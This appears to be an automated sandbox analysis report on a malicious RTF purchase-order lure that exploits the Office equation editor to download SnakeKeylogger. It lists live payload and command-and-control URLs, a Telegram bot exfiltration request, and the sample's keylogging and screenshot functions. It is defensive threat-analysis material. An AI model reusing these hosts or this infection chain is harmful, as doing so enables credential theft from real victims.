Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_002ACB15 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,

2_2_002ACB15

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E2DECFB2-ADA4-4B5F-990B-FC73115868E7}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%209/26/2024%20/%206:20:30%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /txt/XcsQpLjhNNvxYtrw.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.jhxkgroup.online

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 07:19:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exe
Source: EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exee
Source: EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exej
Source: EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exeuuC:
Source: hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crt0
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005AE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005AE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0
Source: hgqilegacy20306.exe, 00000008.00000002.916972860.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe..0
Source: hgqilegacy20306.exe, 00000008.00000002.916972860.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c/D
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0Q
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: hgqilegacy20306.exe, 00000005.00000002.406450755.0000000002237000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002668000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002620000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=net
Source: hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
Source: hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=wmf
Source: hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index
Source: hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
Source: hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49179 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Initial sample is an obfuscated RTF file

Source: initial sample

Static file information: Filename: Thyssenkrupp PO040232.doc

Malicious sample detected (through community Yara rule)

Source: Thyssenkrupp PO040232.doc, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: hgqilegacy20306.exe PID: 3416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: hgqilegacy20306.exe PID: 3508, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\XcsQpLjhNNvxYtrw[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Process Stats: CPU usage > 49%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Memory allocated: 77630000 page read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 5_2_00230760	5_2_00230760
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 5_2_002377F0	5_2_002377F0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 5_2_00233C10	5_2_00233C10
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 5_2_0023B0C8	5_2_0023B0C8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 5_2_00231219	5_2_00231219
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 5_2_0023A370	5_2_0023A370
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 5_2_0023A7A8	5_2_0023A7A8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 5_2_0023A798	5_2_0023A798
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 5_2_002377E0	5_2_002377E0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 5_2_0023BBA0	5_2_0023BBA0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 5_2_0023BB90	5_2_0023BB90
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 5_2_0023ABE0	5_2_0023ABE0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_002540F8	8_2_002540F8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00258100	8_2_00258100
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00254968	8_2_00254968
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_002531B1	8_2_002531B1
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_002569B8	8_2_002569B8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00259A4C	8_2_00259A4C
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00253B58	8_2_00253B58
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_002543C8	8_2_002543C8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00253483	8_2_00253483
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00257490	8_2_00257490
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00255D00	8_2_00255D00
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0025DD50	8_2_0025DD50
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00259DB0	8_2_00259DB0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00253E28	8_2_00253E28
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00254699	8_2_00254699
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00258EC4	8_2_00258EC4
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_002587E0	8_2_002587E0
